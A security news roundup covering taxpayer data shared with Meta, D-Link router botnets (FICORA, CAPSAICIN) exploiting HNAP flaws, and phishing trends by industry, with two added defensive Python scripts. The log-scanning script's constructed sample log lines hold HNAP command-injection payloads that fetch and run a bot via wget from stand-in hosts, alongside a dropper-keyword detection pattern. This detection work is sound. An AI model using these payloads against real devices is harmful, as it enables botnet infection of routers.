3 Tax Prep Firms Shared ‘Extraordinarily Sensitive’ Data About Taxpayers With Meta, Lawmakers Say
A group of congressional Democrats reported that three large tax preparation firms sent “extraordinarily sensitive” information on tens of millions of taxpayers to Facebook parent company Meta over the course of at least two years.
D-Link Routers Under Attack – Botnet Exploiting Devices to Gain Full Remote Control
A surge in cyberattacks leveraging legacy vulnerabilities in D-Link routers has been detected, with two botnets, FICORA and CAPSAICIN, actively exploiting these weaknesses.
Researchers at Fortinet’s FortiGuard Labs observed a spike in activity from these botnets during October and November 2024, highlighting the persistent threat posed by outdated and unpatched networking devices.
Exploitation of Decade-Old Vulnerabilities
The botnets exploit flaws in the Home Network Administration Protocol (HNAP) interface of D-Link routers, enabling remote attackers to execute malicious commands.
These vulnerabilities, tracked as CVE-2015-2051, CVE-2019-10891, CVE-2022-37056 and CVE-2024-33112, were disclosed between 2015 and 2024, yet they remain a significant risk because so many deployed devices have never been patched.
Despite patches being available for many of these flaws, the continued reliance on legacy hardware has created an opportunity for cybercriminals to deploy malware at scale.
The FICORA botnet, a variant of the infamous Mirai malware, uses brute-force techniques to compromise devices and encrypts its configuration and command-and-control (C2) details with the ChaCha20 stream cipher to hinder analysis. It can launch distributed denial-of-service (DDoS) attacks over multiple protocols, including UDP and TCP.
Meanwhile, the Kaiten-based CAPSAICIN botnet prioritizes rapid deployment and eliminates competing malware on infected devices to maintain control.
FortiGuard Labs identified that the FICORA botnet was propagated from servers located in the Netherlands (e.g., IPs 185[.]191[.]126[.]213 and 185[.]191[.]126[.]248). The attacks were global in nature, suggesting they were not targeted but opportunistic campaigns aimed at exploiting any vulnerable device.
Both botnets underscore the dangers posed by outdated network hardware. While the vulnerabilities have been known for years, many organizations have failed to implement patches or replace end-of-life devices. This negligence has allowed attackers to repeatedly exploit these weaknesses.
Experts strongly advise enterprises and individuals to take proactive measures to mitigate these risks:
Regular Updates: Ensure that all routers and network devices are running the latest firmware versions.
Device Replacement: Replace end-of-life (EOL) hardware that no longer receives security updates.
Network Monitoring: Implement comprehensive monitoring solutions to detect unusual traffic patterns indicative of botnet activity.
Access Restrictions: Disable remote (WAN-side) management unless it is absolutely necessary, and use strong, unique passwords for device access.
Organizations must prioritize updating or replacing vulnerable devices to prevent becoming unwitting participants in botnet-driven cybercrime campaigns.
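As an added example (not code from the Fortinet report or from the original article), the following Python script shows the kind of check the Network Monitoring recommendation calls for, applied to the HNAP exploitation described above. It parses constructed web-access log lines in an assumed custom log format (combined format plus a trailing quoted field holding the request's SOAPAction header), and flags requests to /HNAP1/ whose SOAPAction carries shell metacharacters or download-and-execute verbs, the command-injection style used against the older HNAP CVEs. The IP addresses, hostnames and payload strings are all constructed.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample access-log lines for this example (not from the Fortinet report).
# Format: combined log format plus one trailing quoted field carrying the request's
# SOAPAction header, which is an assumed custom log format. Addresses are RFC 5737
# documentation ranges; the payloads imitate the HNAP SOAPAction command-injection style.
SAMPLE_LOG = """\
203.0.113.10 - - [28/Nov/2024:10:01:02 +0000] "POST /HNAP1/ HTTP/1.1" 200 512 "-" "Mozilla/5.0" "http://purenetworks.com/HNAP1/GetDeviceSettings"
203.0.113.10 - - [28/Nov/2024:10:01:03 +0000] "POST /HNAP1/ HTTP/1.1" 500 0 "-" "Wget" "http://purenetworks.com/HNAP1/GetDeviceSettings/`cd /tmp; wget http://203.0.113.5/ficora.sh; sh ficora.sh`"
198.51.100.7 - - [28/Nov/2024:10:02:15 +0000] "GET /HNAP1/ HTTP/1.1" 200 1024 "-" "curl/8.0" "-"
198.51.100.7 - - [28/Nov/2024:10:02:16 +0000] "POST /HNAP1/ HTTP/1.1" 200 0 "-" "curl/8.0" "http://purenetworks.com/HNAP1/GetDeviceSettings;wget%20http://198.51.100.9/bot%20-O%20/tmp/x;chmod%20777%20/tmp/x;/tmp/x"
192.0.2.44 - - [28/Nov/2024:10:03:00 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0" "-"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)" "(?P<soap>[^"]*)"$'
)

# A well-formed HNAP SOAPAction names exactly one action; anything else is suspicious.
VALID_SOAPACTION = re.compile(r"^https?://purenetworks\.com/HNAP1/[A-Za-z0-9_]+$")

# Shell metacharacters and dropper verbs that show up in command-injection payloads.
SHELL_META = re.compile(r"[;`|&]|\$\(")
DROPPER = re.compile(r"\b(wget|curl|tftp|busybox|chmod|sh)\b|/tmp/", re.IGNORECASE)


def parse_line(line):
    """Parse one log line into a dict of fields, or None if it does not match the format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(entry):
    """Return a reason string if the request looks like an HNAP exploitation attempt, else None."""
    if not entry["path"].startswith("/HNAP1"):
        return None
    soap = unquote(entry["soap"])
    if soap == "-":
        return None                      # plain device-description fetch, no SOAPAction
    if VALID_SOAPACTION.match(soap):
        return None                      # ordinary management call
    reasons = []
    if SHELL_META.search(soap):
        reasons.append("shell metacharacters in SOAPAction")
    if DROPPER.search(soap):
        reasons.append("download/exec verbs in SOAPAction")
    if not reasons:
        reasons.append("malformed SOAPAction")
    return "; ".join(reasons)


def scan(log_text):
    """Return alerts for HNAP command-injection attempts found in access-log text."""
    alerts = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        reason = classify(entry)
        if reason:
            alerts.append({"ip": entry["ip"], "ts": entry["ts"],
                           "soapaction": unquote(entry["soap"]), "reason": reason})
    return alerts


def sources(alerts):
    """Count attempts per source IP; mass scanners show up as many hits from a few addresses."""
    return Counter(a["ip"] for a in alerts)


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for a in found:
        print(f'{a["ts"]} {a["ip"]} -> {a["reason"]}: {a["soapaction"][:80]}')
    print("attempts per source:", dict(sources(found)))
```

The benign POST and the bare GET to /HNAP1/ pass through; only the two requests whose SOAPAction escapes the single-action form are flagged. Exposing the SOAPAction header in the log (or capturing it with a reverse proxy or IDS in front of the device) is what makes this check possible; the default combined format never records it.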
Top Five Industries Aggressively Targeted By Phishing Attacks
Phishing attacks continue to pose a significant threat to various industries, with cybercriminals employing sophisticated tactics to deceive recipients.
A recent analysis by Cofense Intelligence, covering data from Q3 2023 to Q3 2024, has identified the top five industries most targeted by phishing attacks using customized subject lines.
Cofense counts a subject line as customized when it carries recipient-specific details (name, email address, phone number or company name) that must be redacted before publication. Ranked by their share of such credential-phishing emails, the five most targeted industries are:
Finance and Insurance: 15.5% of all credential phishing emails with customized subjects. Attackers often mimic routine business communications such as invoices and forms requiring attention.
Manufacturing: 11.3%. This industry is particularly exposed because of its reliance on order- and contract-based communications.
Mining, Quarrying, and Oil and Gas Extraction: 10.3%, with subjects often built around proposals, invoices and shared-document notifications.
Health Care and Social Assistance: 8.2%, typically using notification-based or document-related subjects.
Retail Trade: 7.4%, often receiving phishing attempts themed around sales, contracts and urgent shipments.
Top five industries targeted by emails with customized subjects requiring redaction (Source – Cofense)
The common tactics and trends observed by Cofense Intelligence analysts are:
Subject Customization: Threat actors frequently incorporate the recipient’s name, email address, phone number, or company name in the subject line to increase legitimacy.
Quarterly Fluctuations: Most industries experienced peak volumes of customized phishing emails in Q3 2023, with varying trends in subsequent quarters.
Attachment Types: The most common malicious file types attached to these emails are .HTM(L) (90.3%) and .DOC(X) (9.4%).
Technical Analysis
Industry-specific examples of customized subject lines, with the recipient-specific portions redacted:
Finance and Insurance
” shared ‘Invoice20248904.pdf’ with you”
“Invoice from “
“ACH on 2024-06-28 For “
Manufacturing
“Proposals from “
“File Shared By “
“NEW P.O. # 94153 from “
Mining, Quarrying, and Oil and Gas Extraction
“Contract Proposal for service – “
“Document shared with you: #_Financ…..#88456.docx”
“FW: New Invoice Acknowledgement 6472749IK From “
Techniques that safeguard customers' personally identifiable information (PII) and proprietary company data while still providing actionable intelligence are essential, because they allow accurate threat analysis without compromising sensitive information.
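As an added example (not Cofense's tooling or code from the original article), the following Python script shows one way to do the redaction and analysis described above: it strips a recipient's email address, phone number, name and company from phishing subject lines, records which kinds of customization were present, collapses the customized subjects into templates so one lure counts once, and buckets each template into the lure themes the analysis names (shared document, invoice, order/contract). The subjects and recipient records are constructed for this example; the theme keywords are an assumption for illustration.

```python
import re
from collections import Counter

# Constructed sample data for this example (not Cofense data). Each subject is paired with the
# recipient record it was sent to, so redaction knows which name and company strings to strip.
JANE = {"name": "Jane Doe", "email": "jane.doe@example.com", "company": "Example Corp"}
BOB = {"name": "Bob Roe", "email": "bob.roe@acme-mfg.example", "company": "Acme Manufacturing"}
SAMPLES = [
    ("Jane Doe shared 'Invoice20248904.pdf' with you", JANE),
    ("Invoice from Example Corp", JANE),
    ("ACH on 2024-06-28 For jane.doe@example.com", JANE),
    ("NEW P.O. # 94153 from Acme Manufacturing", BOB),
    ("Contract Proposal for service - Bob, call (555) 010-0100", BOB),
    ("Bob Roe shared 'Invoice20248904.pdf' with you", BOB),
    ("Q3 newsletter", BOB),
]

EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")
# Loose North-American phone pattern: optional +1, then 10 digits with common separators.
PHONE_RE = re.compile(r"(?:\+?1[\s.-]?)?\(?\d{3}\)?[\s.-]?\d{3}[\s.-]?\d{4}\b")

# Lure themes named in the analysis; keyword choices are assumptions, checked in this order.
THEMES = (
    ("shared_document", re.compile(r"\b(?:shared|document)", re.I)),
    ("invoice", re.compile(r"\b(?:invoice|ACH\b)", re.I)),
    ("order_contract", re.compile(r"\bP\.?O\b|\b(?:order|contract|proposal)", re.I)),
)


def redact(subject, recipient):
    """Replace recipient-identifying strings in a subject with placeholders.

    Returns (redacted_subject, sorted list of placeholder kinds found). Emails and phone
    numbers are matched by pattern; name and company come from the recipient record. The
    full name is removed before the bare first name so "Jane Doe" never survives as "<NAME> Doe".
    """
    steps = [(EMAIL_RE, "EMAIL"), (PHONE_RE, "PHONE")]
    if recipient.get("name"):
        steps.append((re.compile(re.escape(recipient["name"]), re.I), "NAME"))
        first = recipient["name"].split()[0]
        steps.append((re.compile(r"\b" + re.escape(first) + r"\b", re.I), "NAME"))
    if recipient.get("company"):
        steps.append((re.compile(re.escape(recipient["company"]), re.I), "COMPANY"))
    found = set()
    out = subject
    for pattern, tag in steps:
        out, n = pattern.subn(f"<{tag}>", out)
        if n:
            found.add(tag)
    return out, sorted(found)


def theme(redacted_subject):
    """Bucket a (redacted) subject into one of the lure themes, or 'other'."""
    for name, pattern in THEMES:
        if pattern.search(redacted_subject):
            return name
    return "other"


def summarize(samples):
    """Collapse customized subjects to templates and count them, plus marker and theme tallies."""
    templates, markers, themes = Counter(), Counter(), Counter()
    for subject, recipient in samples:
        template, kinds = redact(subject, recipient)
        templates[template] += 1
        markers.update(kinds)
        themes[theme(template)] += 1
    return templates, markers, themes


if __name__ == "__main__":
    templates, markers, themes = summarize(SAMPLES)
    for template, n in templates.most_common():
        print(f"{n:2d}  {theme(template):16s} {template}")
    print("customization markers:", dict(markers))
    print("themes:", dict(themes))
```

Redacting against the known recipient record rather than a generic name dictionary is what keeps false positives down: only strings that actually identify the target are replaced, so legitimate words in the lure survive and the resulting templates still read like the examples above.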
The researchers also urge organizations across these industries to remain vigilant and implement robust security measures against these targeted attacks.